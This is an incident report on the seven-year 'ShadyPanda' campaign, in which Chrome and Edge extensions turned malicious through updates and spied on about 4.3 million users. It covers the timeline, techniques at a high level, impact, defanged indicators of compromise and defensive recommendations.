Full Report
And some are still active in the Microsoft Edge store A seven-year malicious browser extension campaign infected 4.3 million Google Chrome and Microsoft Edge users with malware, including backdoors and spyware sending people's data to servers in China. And, according to Koi researchers, five of the extensions with more than 4 million installs are still live in the Edge marketplace.…
Analysis Summary
# Incident Report: Seven-Year Malicious Browser Extension Campaign
## Executive Summary
A sophisticated, seven-year malicious browser extension campaign, attributed to the threat group "ShadyPanda," compromised an estimated 4.3 million users across Google Chrome and Microsoft Edge platforms. Attackers leveraged legitimate-looking productivity tools, deploying malware via stealthy updates that contained backdoors, spyware, and keystroke logging capabilities, leading to extensive data exfiltration to servers primarily located in China. While Google claims to have purged affected extensions, several malicious extensions remain active on the Microsoft Edge store at the time of reporting by researchers.
## Incident Details
- **Discovery Date:** December 1, 2025 (Date of Public Disclosure by Koi Researchers)
- **Incident Date:** Campaign spanning multiple phases, starting as early as 2018, with active exploitation noted in 2023 and mid-2024.
- **Affected Organization:** End-users of Google Chrome and Microsoft Edge browsers globally.
- **Sector:** Technology / Software Distribution Platforms (Browser Extension Marketplaces).
- **Geography:** Global user base; Data exfiltration targets servers in China.
## Timeline of Events
### Initial Access
- **Date/Time:** Started as early as 2018 (for initial active campaigns); specific malicious updates noted mid-2024.
- **Vector:** Submission and approval of seemingly legitimate productivity extensions or wallpaper apps on the official browser stores (Chrome Web Store and Microsoft Edge Store).
- **Details:** Attackers published extensions, allowed them to gain high numbers of installations and even "Featured" status, creating trust before pushing malicious updates.
### Lateral Movement
- **Details:** Not applicable in a traditional sense. The mechanism was **Horizontal Infection** via automatic extension updates affecting all installed users simultaneously. Once deployed, the malware achieved **Browser API Access**, allowing it to inject code into any website, including HTTPS streams.
### Data Exfiltration/Impact
- **Details:** Stolen data included visited URLs, HTTP referrers, activity timestamps, persistent UUID4 identifiers, browser fingerprints, search queries, page interaction data, and cookies. In one major campaign, data was sent to 17 different domains, including 8 Baidu servers in China and 7 dedicated ShadyPanda servers in China.
### Detection & Response
- **Details:** Detected by Koi researchers who observed the multi-phase campaign structure.
- **Response Actions:** Google confirmed that affected extensions were removed from the Chrome Web Store. However, as of the report date, five high-impact extensions with over 4 million combined installs were still active and live on the Edge marketplace.
## Attack Methodology
- **Initial Access:** Publishing high-trust, seemingly benign browser extensions.
- **Persistence:** Maintained by residing as installed extensions on user machines, capable of surviving benign version bumps.
- **Privilege Escalation:** Not explicitly detailed, but the malware inherently leveraged the extensive permissions granted to the extensions (access to all URLs and cookies). The campaign using *Clean Master* utilized updates containing a Remote Code Execution (RCE) enabling backdoor.
- **Defense Evasion:** Employing anti-analysis capabilities to switch to benign behavior if developer tools were detected, hiding malicious activity from researchers.
- **Credential Access:** Keystroke logging (Infinity V+ campaign) and access to stored session data/cookies.
- **Discovery:** Browser fingerprinting and monitoring navigation patterns (HTTP referrers).
- **Lateral Movement:** N/A (Focused on client-side compromise).
- **Collection:** Comprehensive data scraping, including visited URLs, search queries, clicks, and user interaction data.
- **Exfiltration:** Sending collected data in real-time to command-and-control (C2) infrastructure, including numerous servers located in China.
- **Impact:** Complete browser surveillance and data theft.
## Impact Assessment
- **Financial:** Undisclosed, but likely included financial motive stemming from affiliate code injection (eBay, Amazon, Booking.com monetization).
- **Data Breach:** Personally Identifiable Information (PII), browsing history, site interactions, tracking identifiers (UUID4), and browser configuration data for 4.3 million users.
- **Operational:** Low operational impact on the victims' systems beyond performance degradation, but high operational risk due to established backdoors.
- **Reputational:** Significant reputational damage to both the affected extension publishers and the integrity of the Microsoft Edge and Google Chrome extension marketplaces.
## Indicators of Compromise
- **Network Indicators (Defanged):** `api.extensionplay[.]com`, 17 exfiltration domains (including Baidu servers).
- **File Indicators:** N/A (Focus was on code execution within the extension sandbox).
- **Behavioral Indicators:** Hourly checking of C2 servers, real-time transmission of browsing data, injection of affiliate tracking codes, and redirection of searches (e.g., to `trovi[.]com`).
## Response Actions
- **Containment Measures:** Koi researchers publicly disclosed the findings, prompting platform intervention. Google confirmed the removal of affected extensions from their store.
- **Eradication Steps:** Manual or automated removal of the malicious extensions by affected users or marketplace administrators.
- **Recovery Actions:** Users must manually check and uninstall all potentially affected extensions, especially those associated with the ShadyPanda campaigns.
## Lessons Learned
- Marketplace review processes prioritize application submission over continuous monitoring of behavior and subsequent updates, allowing dormant malware to be deployed years after initial approval (e.g., Featured/Verified extensions turning malicious).
- Attackers, "ShadyPanda," successfully employed a "long game" strategy by relying on the trust built over several years.
- Automated update mechanisms, while beneficial for users, are a critical vulnerability when leveraged maliciously.
## Recommendations
- Browser marketplaces must implement continuous, behavioral monitoring of extensions post-approval, specifically analyzing updates for changes in network traffic or introduced code execution capabilities.
- Users should exercise extreme caution when installing productivity extensions, regardless of high install counts or "Verified" status, and regularly audit current extensions.
- Developers of extensions should adopt least-privilege principles, requesting only the minimum necessary permissions.